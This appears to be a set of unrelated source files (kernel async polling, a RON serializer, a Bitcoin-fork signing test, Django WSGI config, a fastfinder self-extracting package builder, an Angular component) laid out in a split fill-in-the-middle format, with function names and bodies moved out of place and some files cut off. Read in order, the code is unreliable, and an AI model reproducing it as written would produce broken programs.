let mut cached_comp_tail = buf.read_comp_ring_tail();
let req_count = buf.request_count(cached_req_head)?;
// TODO: limit requests count or time for one thread
for _ in 0..req_count {
if self.thread.is_exited() {
break;
}
let req_entry = buf.req_entry_at(cached_req_head);
let res = self.do_async_call(&req_entry).await;
while buf.completion_count(cached_comp_tail)? == buf.comp_capacity {
yield_now().await;
}
*buf.comp_entry_at(cached_comp_tail) =
CompletionRingEntry::new(req_entry.user_data, res);
cached_comp_tail += 1;
buf.write_comp_ring_tail(cached_comp_tail);
cached_req_head += 1;
}
buf.write_req_ring_head(cached_req_head);
Ok(())
}
async fn polling(&self) {
info!("start async call polling for thread {}...", self.thread.id);
while !self.thread.is_exited() {
let res = self.polling_once().await;
if let Err(e) = res {
self.thread.exit(e as usize);
break;
}
yield_now().await;
}
info!("async call polling for thread {} is done.", self.thread.id);
}
}
type AsyncCallFuture = dyn Future<Output = ()> + Send;
type AsyncCallFuturePinned = Pin<Box<AsyncCallFuture>>;
struct AsyncCallSwitchFuture {
thread: Arc<Thread>,
future: AsyncCallFuturePinned,
}
impl AsyncCallSwitchFuture {
fn new(thread: Arc<Thread>, future: AsyncCallFuturePinned) -> Self {
Self { thread, future }
}
}
impl Future for AsyncCallSwitchFuture {
type Output = ();
fn poll(self: Pin<&mut Self>, cx: &mut Context<'_>) -> Poll<Self::Output> {
PerCpu::set_current_thread(&self.thread);
self.get_mut().future.as_mut().poll(cx)
}
}
fn spawn_polling(thread: &Arc<Thread>) |
pub fn init() {
info!("async call init end.");
}
pub fn run_forever() -> ! {
loop {
PerCpu::from_cpu_id(IO_CPU_ID).run_until_idle();
info!("no async coroutines to run, waiting for interrupt...");
cpu::wait_for_interrupt();
}
}
| {
let ac = AsyncCall::new(thread.clone());
PerCpu::from_cpu_id(IO_CPU_ID).spawn(AsyncCallSwitchFuture::new(
thread.clone(),
Box::pin(async move { ac.polling().await }),
));
cpu::send_ipi(IO_CPU_ID);
} |
wdecimal.rs | use crate::context::ContextProvider;
use crate::model::row::Row;
use crate::type_writer::TypeBodyWriter;
use crate::types::common::Common;
use liquesco_common::error::LqError;
use liquesco_schema::types::decimal::TDecimal;
use std::marker::PhantomData;
pub struct WDecimal<'a> {
_phantom: &'a PhantomData<()>,
}
impl<'a> TypeBodyWriter for WDecimal<'a> {
type T = TDecimal<'a>;
fn write<'b, TContext>(_: &TContext, typ: &Self::T) -> Result<Vec<Row<'static>>, LqError>
where
TContext: ContextProvider<'b>,
{
let range = typ.range();
Ok(vec![
Row::association_with_text(
format!("Minimum ({})", included(range.start_included())),
Common::fmt_decimal(range.start()),
),
Row::association_with_text(
format!("Maximum ({})", included(range.end_included())),
Common::fmt_decimal(range.end()),
),
])
}
}
fn included(included: bool) -> &'static str | {
if included {
"inclusive"
} else {
"exclusive"
}
} |
|
signmessages.py | #!/usr/bin/env python3
# Copyright (c) 2016 The Bitcoin Core developers
# Copyright (c) 2017 The Whiff Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test RPC commands for signing and verifying messages."""
from test_framework.test_framework import WhiffTestFramework
from test_framework.util import assert_equal
class SignMessagesTest(WhiffTestFramework):
def set_test_params(self):
|
def run_test(self):
message = 'This is just a test message'
self.log.info('test signing with priv_key')
priv_key = 'cUeKHd5orzT3mz8P9pxyREHfsWtVfgsfDjiZZBcjUBAaGk1BTj7N'
address = 'mpLQjfK79b7CCV4VMJWEWAj5Mpx8Up5zxB'
expected_signature = 'H5vCbG+WhOeOPJ3jf6oux/1oSjkuIGZigCw4NW+A0/fSDlgdO4fMq0SWSfx7gUMB9kuG+t/0BQxtXaTCr7v9fGM='
signature = self.nodes[0].signmessagewithprivkey(priv_key, message)
assert_equal(expected_signature, signature)
assert(self.nodes[0].verifymessage(address, signature, message))
self.log.info('test signing with an address with wallet')
address = self.nodes[0].getnewaddress()
signature = self.nodes[0].signmessage(address, message)
assert(self.nodes[0].verifymessage(address, signature, message))
self.log.info('test verifying with another address should not work')
other_address = self.nodes[0].getnewaddress()
other_signature = self.nodes[0].signmessage(other_address, message)
assert(not self.nodes[0].verifymessage(other_address, signature, message))
assert(not self.nodes[0].verifymessage(address, other_signature, message))
if __name__ == '__main__':
SignMessagesTest().main()
| self.setup_clean_chain = True
self.num_nodes = 1 |
wsgi.py | """
WSGI config for billsengine_31836 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see |
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'billsengine_31836.settings')
application = get_wsgi_application() | https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
""" |
mod.rs | use serde::{ser, Deserialize, Serialize};
use std::io;
use crate::{
error::{Error, Result},
extensions::Extensions,
options::Options,
parse::{is_ident_first_char, is_ident_other_char, LargeSInt, LargeUInt},
};
#[cfg(test)]
mod tests;
mod value;
/// Serializes `value` into `writer`
pub fn to_writer<W, T>(writer: W, value: &T) -> Result<()>
where
W: io::Write,
T: ?Sized + Serialize,
{
Options::default().to_writer(writer, value)
}
/// Serializes `value` into `writer` in a pretty way.
pub fn to_writer_pretty<W, T>(writer: W, value: &T, config: PrettyConfig) -> Result<()>
where
W: io::Write,
T: ?Sized + Serialize,
{
Options::default().to_writer_pretty(writer, value, config)
}
/// Serializes `value` and returns it as string.
///
/// This function does not generate any newlines or nice formatting;
/// if you want that, you can use `to_string_pretty` instead.
pub fn to_string<T>(value: &T) -> Result<String>
where
T: ?Sized + Serialize,
{
Options::default().to_string(value)
}
/// Serializes `value` in the recommended RON layout in a pretty way.
pub fn to_string_pretty<T>(value: &T, config: PrettyConfig) -> Result<String>
where
T: ?Sized + Serialize,
{
Options::default().to_string_pretty(value, config)
}
/// Pretty serializer state
struct Pretty {
indent: usize,
sequence_index: Vec<usize>,
}
/// Pretty serializer configuration.
///
/// # Examples
///
/// ```
/// use ron::ser::PrettyConfig;
///
/// let my_config = PrettyConfig::new()
/// .depth_limit(4)
/// // definitely superior (okay, just joking)
/// .indentor("\t".to_owned());
/// ```
#[derive(Clone, Debug, Serialize, Deserialize)]
#[serde(default)]
#[non_exhaustive]
pub struct PrettyConfig {
/// Limit the pretty-ness up to the given depth.
pub depth_limit: usize,
/// New line string
pub new_line: String,
/// Indentation string
pub indentor: String,
/// Separator string
pub separator: String,
// Whether to emit struct names
pub struct_names: bool,
/// Separate tuple members with indentation
pub separate_tuple_members: bool,
/// Enumerate array items in comments
pub enumerate_arrays: bool,
/// Enable extensions. Only configures 'implicit_some',
/// 'unwrap_newtypes', and 'unwrap_variant_newtypes' for now.
pub extensions: Extensions,
/// Enable compact arrays
pub compact_arrays: bool,
}
impl PrettyConfig {
/// Creates a default `PrettyConfig`.
pub fn new() -> Self {
Default::default()
}
/// Limits the pretty-formatting based on the number of indentations.
/// I.e., with a depth limit of 5, starting with an element of depth
/// (indentation level) 6, everything will be put into the same line,
/// without pretty formatting.
///
/// Default: [std::usize::MAX]
pub fn depth_limit(mut self, depth_limit: usize) -> Self {
self.depth_limit = depth_limit;
self
}
/// Configures the newlines used for serialization.
///
/// Default: `\r\n` on Windows, `\n` otherwise
pub fn new_line(mut self, new_line: String) -> Self {
self.new_line = new_line;
self
}
/// Configures the string sequence used for indentation.
///
/// Default: 4 spaces
pub fn indentor(mut self, indentor: String) -> Self {
self.indentor = indentor;
self
}
/// Configures the string sequence used to separate items inline.
///
/// Default: 1 space
pub fn separator(mut self, separator: String) -> Self {
self.separator = separator;
self
}
/// Configures whether to emit struct names.
///
/// Default: `false`
pub fn struct_names(mut self, struct_names: bool) -> Self {
self.struct_names = struct_names;
self
}
/// Configures whether tuples are single- or multi-line.
/// If set to `true`, tuples will have their fields indented and in new
/// lines. If set to `false`, tuples will be serialized without any
/// newlines or indentations.
///
/// Default: `false`
pub fn separate_tuple_members(mut self, separate_tuple_members: bool) -> Self {
self.separate_tuple_members = separate_tuple_members;
self
}
/// Configures whether a comment shall be added to every array element,
/// indicating the index.
///
/// Default: `false`
pub fn enumerate_arrays(mut self, enumerate_arrays: bool) -> Self {
self.enumerate_arrays = enumerate_arrays;
self
}
/// Configures whether every array should be a single line (true) or a multi line one (false)
/// When false, `["a","b"]` (as well as any array) will serialize to
/// `
/// [
/// "a",
/// "b",
/// ]
/// `
/// When true, `["a","b"]` (as well as any array) will serialize to `["a","b"]`
///
/// Default: `false`
pub fn compact_arrays(mut self, compact_arrays: bool) -> Self {
self.compact_arrays = compact_arrays;
self
}
/// Configures extensions
///
/// Default: Extensions::empty()
pub fn extensions(mut self, extensions: Extensions) -> Self {
self.extensions = extensions;
self
}
}
impl Default for PrettyConfig {
fn default() -> Self {
PrettyConfig {
depth_limit: !0,
new_line: if cfg!(not(target_os = "windows")) {
String::from("\n")
} else {
String::from("\r\n")
},
indentor: String::from(" "),
separator: String::from(" "),
struct_names: false,
separate_tuple_members: false,
enumerate_arrays: false,
extensions: Extensions::empty(),
compact_arrays: false,
}
}
}
/// The RON serializer.
///
/// You can just use `to_string` for deserializing a value.
/// If you want it pretty-printed, take a look at the `pretty` module.
pub struct Serializer<W: io::Write> {
output: W,
pretty: Option<(PrettyConfig, Pretty)>,
default_extensions: Extensions,
is_empty: Option<bool>,
newtype_variant: bool,
}
impl<W: io::Write> Serializer<W> {
/// Creates a new `Serializer`.
///
/// Most of the time you can just use `to_string` or `to_string_pretty`.
pub fn new(writer: W, config: Option<PrettyConfig>) -> Result<Self> {
Self::with_options(writer, config, Options::default())
}
/// Creates a new `Serializer`.
///
/// Most of the time you can just use `to_string` or `to_string_pretty`.
pub fn with_options(
mut writer: W,
config: Option<PrettyConfig>,
options: Options,
) -> Result<Self> {
if let Some(conf) = &config {
let non_default_extensions = !options.default_extensions;
if (non_default_extensions & conf.extensions).contains(Extensions::IMPLICIT_SOME) {
writer.write_all(b"#![enable(implicit_some)]")?;
writer.write_all(conf.new_line.as_bytes())?;
};
if (non_default_extensions & conf.extensions).contains(Extensions::UNWRAP_NEWTYPES) {
writer.write_all(b"#![enable(unwrap_newtypes)]")?;
writer.write_all(conf.new_line.as_bytes())?;
};
if (non_default_extensions & conf.extensions)
.contains(Extensions::UNWRAP_VARIANT_NEWTYPES)
{
writer.write_all(b"#![enable(unwrap_variant_newtypes)]")?;
writer.write_all(conf.new_line.as_bytes())?;
};
};
Ok(Serializer {
output: writer,
pretty: config.map(|conf| {
(
conf,
Pretty {
indent: 0,
sequence_index: Vec::new(),
},
)
}),
default_extensions: options.default_extensions,
is_empty: None,
newtype_variant: false,
})
}
fn separate_tuple_members(&self) -> bool {
self.pretty
.as_ref()
.map_or(false, |&(ref config, _)| config.separate_tuple_members)
}
fn compact_arrays(&self) -> bool {
self.pretty
.as_ref()
.map_or(false, |&(ref config, _)| config.compact_arrays)
}
fn extensions(&self) -> Extensions {
self.default_extensions
| self
.pretty
.as_ref()
.map_or(Extensions::empty(), |&(ref config, _)| config.extensions)
}
fn start_indent(&mut self) -> Result<()> {
if let Some((ref config, ref mut pretty)) = self.pretty {
pretty.indent += 1;
if pretty.indent <= config.depth_limit {
let is_empty = self.is_empty.unwrap_or(false);
if !is_empty {
self.output.write_all(config.new_line.as_bytes())?;
}
}
}
Ok(())
}
fn indent(&mut self) -> io::Result<()> {
if let Some((ref config, ref pretty)) = self.pretty {
if pretty.indent <= config.depth_limit {
for _ in 0..pretty.indent {
self.output.write_all(config.indentor.as_bytes())?;
}
}
}
Ok(())
}
fn end_indent(&mut self) -> io::Result<()> {
if let Some((ref config, ref mut pretty)) = self.pretty {
if pretty.indent <= config.depth_limit {
let is_empty = self.is_empty.unwrap_or(false);
if !is_empty {
for _ in 1..pretty.indent {
self.output.write_all(config.indentor.as_bytes())?;
}
}
}
pretty.indent -= 1;
self.is_empty = None;
}
Ok(())
}
fn serialize_escaped_str(&mut self, value: &str) -> io::Result<()> {
self.output.write_all(b"\"")?;
let mut scalar = [0u8; 4];
for c in value.chars().flat_map(|c| c.escape_debug()) {
self.output
.write_all(c.encode_utf8(&mut scalar).as_bytes())?;
}
self.output.write_all(b"\"")?;
Ok(())
}
fn serialize_sint(&mut self, value: impl Into<LargeSInt>) -> Result<()> {
// TODO optimize
write!(self.output, "{}", value.into())?;
Ok(())
}
fn serialize_uint(&mut self, value: impl Into<LargeUInt>) -> Result<()> {
// TODO optimize
write!(self.output, "{}", value.into())?;
Ok(())
}
fn write_identifier(&mut self, name: &str) -> io::Result<()> {
let mut bytes = name.as_bytes().iter().cloned();
if !bytes.next().map_or(false, is_ident_first_char) || !bytes.all(is_ident_other_char) {
self.output.write_all(b"r#")?;
}
self.output.write_all(name.as_bytes())?;
Ok(())
}
fn struct_names(&self) -> bool {
self.pretty
.as_ref()
.map(|(pc, _)| pc.struct_names)
.unwrap_or(false)
}
}
impl<'a, W: io::Write> ser::Serializer for &'a mut Serializer<W> {
type Error = Error;
type Ok = ();
type SerializeMap = Compound<'a, W>;
type SerializeSeq = Compound<'a, W>;
type SerializeStruct = Compound<'a, W>;
type SerializeStructVariant = Compound<'a, W>;
type SerializeTuple = Compound<'a, W>;
type SerializeTupleStruct = Compound<'a, W>;
type SerializeTupleVariant = Compound<'a, W>;
fn serialize_bool(self, v: bool) -> Result<()> {
self.output.write_all(if v { b"true" } else { b"false" })?;
Ok(())
}
fn serialize_i8(self, v: i8) -> Result<()> |
fn serialize_i16(self, v: i16) -> Result<()> {
self.serialize_sint(v)
}
fn serialize_i32(self, v: i32) -> Result<()> {
self.serialize_sint(v)
}
fn serialize_i64(self, v: i64) -> Result<()> {
self.serialize_sint(v)
}
#[cfg(feature = "integer128")]
fn serialize_i128(self, v: i128) -> Result<()> {
self.serialize_sint(v)
}
fn serialize_u8(self, v: u8) -> Result<()> {
self.serialize_uint(v)
}
fn serialize_u16(self, v: u16) -> Result<()> {
self.serialize_uint(v)
}
fn serialize_u32(self, v: u32) -> Result<()> {
self.serialize_uint(v)
}
fn serialize_u64(self, v: u64) -> Result<()> {
self.serialize_uint(v)
}
#[cfg(feature = "integer128")]
fn serialize_u128(self, v: u128) -> Result<()> {
self.serialize_uint(v)
}
fn serialize_f32(self, v: f32) -> Result<()> {
write!(self.output, "{}", v)?;
if v.fract() == 0.0 {
write!(self.output, ".0")?;
}
Ok(())
}
fn serialize_f64(self, v: f64) -> Result<()> {
write!(self.output, "{}", v)?;
if v.fract() == 0.0 {
write!(self.output, ".0")?;
}
Ok(())
}
fn serialize_char(self, v: char) -> Result<()> {
self.output.write_all(b"'")?;
if v == '\\' || v == '\'' {
self.output.write_all(b"\\")?;
}
write!(self.output, "{}", v)?;
self.output.write_all(b"'")?;
Ok(())
}
fn serialize_str(self, v: &str) -> Result<()> {
self.serialize_escaped_str(v)?;
Ok(())
}
fn serialize_bytes(self, v: &[u8]) -> Result<()> {
self.serialize_str(base64::encode(v).as_str())
}
fn serialize_none(self) -> Result<()> {
self.output.write_all(b"None")?;
Ok(())
}
fn serialize_some<T>(self, value: &T) -> Result<()>
where
T: ?Sized + Serialize,
{
let implicit_some = self.extensions().contains(Extensions::IMPLICIT_SOME);
if !implicit_some {
self.output.write_all(b"Some(")?;
}
value.serialize(&mut *self)?;
if !implicit_some {
self.output.write_all(b")")?;
}
Ok(())
}
fn serialize_unit(self) -> Result<()> {
if !self.newtype_variant {
self.output.write_all(b"()")?;
}
self.newtype_variant = false;
Ok(())
}
fn serialize_unit_struct(self, name: &'static str) -> Result<()> {
if self.struct_names() && !self.newtype_variant {
self.write_identifier(name)?;
Ok(())
} else {
self.serialize_unit()
}
}
fn serialize_unit_variant(self, _: &'static str, _: u32, variant: &'static str) -> Result<()> {
self.write_identifier(variant)?;
Ok(())
}
fn serialize_newtype_struct<T>(self, name: &'static str, value: &T) -> Result<()>
where
T: ?Sized + Serialize,
{
if self.extensions().contains(Extensions::UNWRAP_NEWTYPES) || self.newtype_variant {
self.newtype_variant = false;
return value.serialize(&mut *self);
}
if self.struct_names() {
self.write_identifier(name)?;
}
self.output.write_all(b"(")?;
value.serialize(&mut *self)?;
self.output.write_all(b")")?;
Ok(())
}
fn serialize_newtype_variant<T>(
self,
_: &'static str,
_: u32,
variant: &'static str,
value: &T,
) -> Result<()>
where
T: ?Sized + Serialize,
{
self.write_identifier(variant)?;
self.output.write_all(b"(")?;
self.newtype_variant = self
.extensions()
.contains(Extensions::UNWRAP_VARIANT_NEWTYPES);
value.serialize(&mut *self)?;
self.newtype_variant = false;
self.output.write_all(b")")?;
Ok(())
}
fn serialize_seq(self, len: Option<usize>) -> Result<Self::SerializeSeq> {
self.newtype_variant = false;
self.output.write_all(b"[")?;
if let Some(len) = len {
self.is_empty = Some(len == 0);
}
if !self.compact_arrays() {
self.start_indent()?;
}
if let Some((_, ref mut pretty)) = self.pretty {
pretty.sequence_index.push(0);
}
Ok(Compound {
ser: self,
state: State::First,
newtype_variant: false,
})
}
fn serialize_tuple(self, len: usize) -> Result<Self::SerializeTuple> {
let old_newtype_variant = self.newtype_variant;
self.newtype_variant = false;
if !old_newtype_variant {
self.output.write_all(b"(")?;
}
if self.separate_tuple_members() {
self.is_empty = Some(len == 0);
self.start_indent()?;
}
Ok(Compound {
ser: self,
state: State::First,
newtype_variant: old_newtype_variant,
})
}
fn serialize_tuple_struct(
self,
name: &'static str,
len: usize,
) -> Result<Self::SerializeTupleStruct> {
if self.struct_names() && !self.newtype_variant {
self.write_identifier(name)?;
}
self.serialize_tuple(len)
}
fn serialize_tuple_variant(
self,
_: &'static str,
_: u32,
variant: &'static str,
len: usize,
) -> Result<Self::SerializeTupleVariant> {
self.newtype_variant = false;
self.write_identifier(variant)?;
self.output.write_all(b"(")?;
if self.separate_tuple_members() {
self.is_empty = Some(len == 0);
self.start_indent()?;
}
Ok(Compound {
ser: self,
state: State::First,
newtype_variant: false,
})
}
fn serialize_map(self, len: Option<usize>) -> Result<Self::SerializeMap> {
self.newtype_variant = false;
self.output.write_all(b"{")?;
if let Some(len) = len {
self.is_empty = Some(len == 0);
}
self.start_indent()?;
Ok(Compound {
ser: self,
state: State::First,
newtype_variant: false,
})
}
fn serialize_struct(self, name: &'static str, len: usize) -> Result<Self::SerializeStruct> {
let old_newtype_variant = self.newtype_variant;
self.newtype_variant = false;
if !old_newtype_variant {
if self.struct_names() {
self.write_identifier(name)?;
}
self.output.write_all(b"(")?;
}
self.is_empty = Some(len == 0);
self.start_indent()?;
Ok(Compound {
ser: self,
state: State::First,
newtype_variant: old_newtype_variant,
})
}
fn serialize_struct_variant(
self,
_: &'static str,
_: u32,
variant: &'static str,
len: usize,
) -> Result<Self::SerializeStructVariant> {
self.newtype_variant = false;
self.write_identifier(variant)?;
self.output.write_all(b"(")?;
self.is_empty = Some(len == 0);
self.start_indent()?;
Ok(Compound {
ser: self,
state: State::First,
newtype_variant: false,
})
}
}
enum State {
First,
Rest,
}
#[doc(hidden)]
pub struct Compound<'a, W: io::Write> {
ser: &'a mut Serializer<W>,
state: State,
newtype_variant: bool,
}
impl<'a, W: io::Write> ser::SerializeSeq for Compound<'a, W> {
type Error = Error;
type Ok = ();
fn serialize_element<T>(&mut self, value: &T) -> Result<()>
where
T: ?Sized + Serialize,
{
if let State::First = self.state {
self.state = State::Rest;
} else {
self.ser.output.write_all(b",")?;
if let Some((ref config, ref mut pretty)) = self.ser.pretty {
if pretty.indent <= config.depth_limit && !config.compact_arrays {
self.ser.output.write_all(config.new_line.as_bytes())?;
} else {
self.ser.output.write_all(config.separator.as_bytes())?;
}
}
}
if !self.ser.compact_arrays() {
self.ser.indent()?;
}
if let Some((ref mut config, ref mut pretty)) = self.ser.pretty {
if pretty.indent <= config.depth_limit && config.enumerate_arrays {
let index = pretty.sequence_index.last_mut().unwrap();
write!(self.ser.output, "/*[{}]*/ ", index)?;
*index += 1;
}
}
value.serialize(&mut *self.ser)?;
Ok(())
}
fn end(self) -> Result<()> {
if let State::Rest = self.state {
if let Some((ref config, ref mut pretty)) = self.ser.pretty {
if pretty.indent <= config.depth_limit && !config.compact_arrays {
self.ser.output.write_all(b",")?;
self.ser.output.write_all(config.new_line.as_bytes())?;
}
}
}
if !self.ser.compact_arrays() {
self.ser.end_indent()?;
}
if let Some((_, ref mut pretty)) = self.ser.pretty {
pretty.sequence_index.pop();
}
// seq always disables `self.newtype_variant`
self.ser.output.write_all(b"]")?;
Ok(())
}
}
impl<'a, W: io::Write> ser::SerializeTuple for Compound<'a, W> {
type Error = Error;
type Ok = ();
fn serialize_element<T>(&mut self, value: &T) -> Result<()>
where
T: ?Sized + Serialize,
{
if let State::First = self.state {
self.state = State::Rest;
} else {
self.ser.output.write_all(b",")?;
if let Some((ref config, ref pretty)) = self.ser.pretty {
if pretty.indent <= config.depth_limit && self.ser.separate_tuple_members() {
self.ser.output.write_all(config.new_line.as_bytes())?;
} else {
self.ser.output.write_all(config.separator.as_bytes())?;
}
}
}
if self.ser.separate_tuple_members() {
self.ser.indent()?;
}
value.serialize(&mut *self.ser)?;
Ok(())
}
fn end(self) -> Result<()> {
if let State::Rest = self.state {
if let Some((ref config, ref pretty)) = self.ser.pretty {
if self.ser.separate_tuple_members() && pretty.indent <= config.depth_limit {
self.ser.output.write_all(b",")?;
self.ser.output.write_all(config.new_line.as_bytes())?;
}
}
}
if self.ser.separate_tuple_members() {
self.ser.end_indent()?;
}
if !self.newtype_variant {
self.ser.output.write_all(b")")?;
}
Ok(())
}
}
// Same thing but for tuple structs.
impl<'a, W: io::Write> ser::SerializeTupleStruct for Compound<'a, W> {
type Error = Error;
type Ok = ();
fn serialize_field<T>(&mut self, value: &T) -> Result<()>
where
T: ?Sized + Serialize,
{
ser::SerializeTuple::serialize_element(self, value)
}
fn end(self) -> Result<()> {
ser::SerializeTuple::end(self)
}
}
impl<'a, W: io::Write> ser::SerializeTupleVariant for Compound<'a, W> {
type Error = Error;
type Ok = ();
fn serialize_field<T>(&mut self, value: &T) -> Result<()>
where
T: ?Sized + Serialize,
{
ser::SerializeTuple::serialize_element(self, value)
}
fn end(self) -> Result<()> {
ser::SerializeTuple::end(self)
}
}
impl<'a, W: io::Write> ser::SerializeMap for Compound<'a, W> {
type Error = Error;
type Ok = ();
fn serialize_key<T>(&mut self, key: &T) -> Result<()>
where
T: ?Sized + Serialize,
{
if let State::First = self.state {
self.state = State::Rest;
} else {
self.ser.output.write_all(b",")?;
if let Some((ref config, ref pretty)) = self.ser.pretty {
if pretty.indent <= config.depth_limit {
self.ser.output.write_all(config.new_line.as_bytes())?;
} else {
self.ser.output.write_all(config.separator.as_bytes())?;
}
}
}
self.ser.indent()?;
key.serialize(&mut *self.ser)
}
fn serialize_value<T>(&mut self, value: &T) -> Result<()>
where
T: ?Sized + Serialize,
{
self.ser.output.write_all(b":")?;
if let Some((ref config, _)) = self.ser.pretty {
self.ser.output.write_all(config.separator.as_bytes())?;
}
value.serialize(&mut *self.ser)?;
Ok(())
}
fn end(self) -> Result<()> {
if let State::Rest = self.state {
if let Some((ref config, ref pretty)) = self.ser.pretty {
if pretty.indent <= config.depth_limit {
self.ser.output.write_all(b",")?;
self.ser.output.write_all(config.new_line.as_bytes())?;
}
}
}
self.ser.end_indent()?;
// map always disables `self.newtype_variant`
self.ser.output.write_all(b"}")?;
Ok(())
}
}
impl<'a, W: io::Write> ser::SerializeStruct for Compound<'a, W> {
type Error = Error;
type Ok = ();
fn serialize_field<T>(&mut self, key: &'static str, value: &T) -> Result<()>
where
T: ?Sized + Serialize,
{
if let State::First = self.state {
self.state = State::Rest;
} else {
self.ser.output.write_all(b",")?;
if let Some((ref config, ref pretty)) = self.ser.pretty {
if pretty.indent <= config.depth_limit {
self.ser.output.write_all(config.new_line.as_bytes())?;
} else {
self.ser.output.write_all(config.separator.as_bytes())?;
}
}
}
self.ser.indent()?;
self.ser.write_identifier(key)?;
self.ser.output.write_all(b":")?;
if let Some((ref config, _)) = self.ser.pretty {
self.ser.output.write_all(config.separator.as_bytes())?;
}
value.serialize(&mut *self.ser)?;
Ok(())
}
fn end(self) -> Result<()> {
if let State::Rest = self.state {
if let Some((ref config, ref pretty)) = self.ser.pretty {
if pretty.indent <= config.depth_limit {
self.ser.output.write_all(b",")?;
self.ser.output.write_all(config.new_line.as_bytes())?;
}
}
}
self.ser.end_indent()?;
if !self.newtype_variant {
self.ser.output.write_all(b")")?;
}
Ok(())
}
}
impl<'a, W: io::Write> ser::SerializeStructVariant for Compound<'a, W> {
type Error = Error;
type Ok = ();
fn serialize_field<T>(&mut self, key: &'static str, value: &T) -> Result<()>
where
T: ?Sized + Serialize,
{
ser::SerializeStruct::serialize_field(self, key, value)
}
fn end(self) -> Result<()> {
ser::SerializeStruct::end(self)
}
}
| {
self.serialize_sint(v)
} |
sfxbuilder.go | package main
import (
"archive/zip"
"bytes"
"fmt"
"io"
"io/ioutil"
"net/http"
"os"
"path/filepath"
"runtime"
"strings"
"gopkg.in/yaml.v3"
)
// BuildSFX creates a self-extracting rar zip and embed the fastfinder executable / configuration file / yara rules
func | (configuration Configuration, outputSfxExe string, logLevel int, logFileLocation string, noAdvUI bool, hideWindow bool) {
// compress inputDirectory into archive
archive := fastfinderResourcesCompress(configuration, logLevel, logFileLocation, noAdvUI, hideWindow)
file, err := os.Create(outputSfxExe)
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
defer file.Close()
// pack sfx binary and customized archive together
file.Write(sfxBinary)
file.Write(archive.Bytes())
}
// fastfinderResourcesCompress compress every package file into the zip archive
func fastfinderResourcesCompress(configuration Configuration, logLevel int, logFileLocation string, noAdvUI bool, hideWindow bool) bytes.Buffer {
var buffer bytes.Buffer
archive := zip.NewWriter(&buffer)
// embed fastfinder executable
exeName := "fastfinder"
if runtime.GOOS == "windows" {
exeName += ".exe"
}
zipFile, err := archive.Create(exeName)
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
fsFile, err := os.ReadFile(os.Args[0])
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
r := bytes.NewReader(fsFile)
_, err = io.Copy(zipFile, r)
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
// embed yara rules
configuration.Input.Content.Yara = EnumerateYaraInFolders(configuration.Input.Content.Yara)
for i := 0; i < len(configuration.Input.Content.Yara); i++ {
var fileName string
var fsFile []byte
if IsValidUrl(configuration.Input.Content.Yara[i]) {
response, err := http.Get(configuration.Input.Content.Yara[i])
if err != nil {
LogMessage(LOG_ERROR, "YARA file URL unreachable", configuration.Input.Content.Yara[i], err)
}
fsFile, err = ioutil.ReadAll(response.Body)
if err != nil {
LogMessage(LOG_ERROR, "YARA file URL content unreadable", configuration.Input.Content.Yara[i], err)
}
response.Body.Close()
fileName = filepath.Base(configuration.Input.Content.Yara[i])[:len(filepath.Base(configuration.Input.Content.Yara[i]))-4]
if !strings.HasSuffix(fileName, ".yar") {
fileName += ".yar"
}
} else {
fileName = filepath.Base(configuration.Input.Content.Yara[i])
fsFile, err = os.ReadFile(configuration.Input.Content.Yara[i])
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
}
zipFile, err := archive.Create("fastfinder_resources/" + fileName)
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
// cipher rules
if configuration.AdvancedParameters.YaraRC4Key != "" {
fsFile = RC4Cipher(fsFile, configuration.AdvancedParameters.YaraRC4Key)
}
r := bytes.NewReader(fsFile)
_, err = io.Copy(zipFile, r)
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
configuration.Input.Content.Yara[i] = "'./fastfinder_resources/" + fileName + "'"
}
// embed configuration file
zipFile, err = archive.Create("fastfinder_resources/configuration.yaml")
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
d, err := yaml.Marshal(&configuration)
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
// cipher configuration file
d = RC4Cipher(d, BUILDER_RC4_KEY)
r = bytes.NewReader(d)
_, err = io.Copy(zipFile, r)
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
// sfx exec instructions
var sfxcomment = "the comment below contains sfx script commands\r\n\r\n" +
"Path=" + tempFolder + "\r\n" +
"Setup=" + exeName + " -c " + "fastfinder_resources/configuration.yaml"
// propagate loglevel param
sfxcomment += fmt.Sprintf(" -v %d", logLevel)
// propagage advanced UI param
if noAdvUI {
sfxcomment += " -u"
}
// output log file
if len(logFileLocation) > 0 {
//sfxcomment += " -o \"" + logFileLocation + "\""
sfxcomment += fmt.Sprintf(" -o %s", logFileLocation)
}
if hideWindow && runtime.GOOS == "windows" {
sfxcomment += " -n"
sfxcomment += "\r\n" +
"Silent=1"
}
archive.SetComment(sfxcomment)
if err != nil {
return buffer
}
err = archive.Close()
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
return buffer
}
| BuildSFX |
books.ts | import {Component, OnInit} from '@angular/core';
import {Router, ROUTER_DIRECTIVES} from '@angular/router-deprecated';
import {Http, Response} from '@angular/http';
import {Book} from '../../beans/book';
import {BooksService} from '../../services/booksService';
import {UserService} from '../../services/userService';
import {DataContainerService} from '../../services/dataContainerService';
import {KPagination} from '../kpagination/kpagination';
import {FilterFieldPipe} from '../../pipes/filterFieldPipe';
import {UpdateDataPipe} from '../../pipes/updateDataPipe';
import {OrderByPipe} from '../../pipes/orderByPipe';
@Component({
selector: 'books',
templateUrl: 'src/components/books/books.html',
directives: [ROUTER_DIRECTIVES, KPagination],
pipes: [FilterFieldPipe, UpdateDataPipe, OrderByPipe]
})
export class | implements OnInit{
books: Book[]= [];
currentPage: number = 1;
//pagination filters
bookNameFilter: string = '';
booksPerPageFilter: number = 4;
reverseOrderFilter: boolean = false;
constructor(
private router: Router,
private booksService: BooksService,
public userService: UserService,
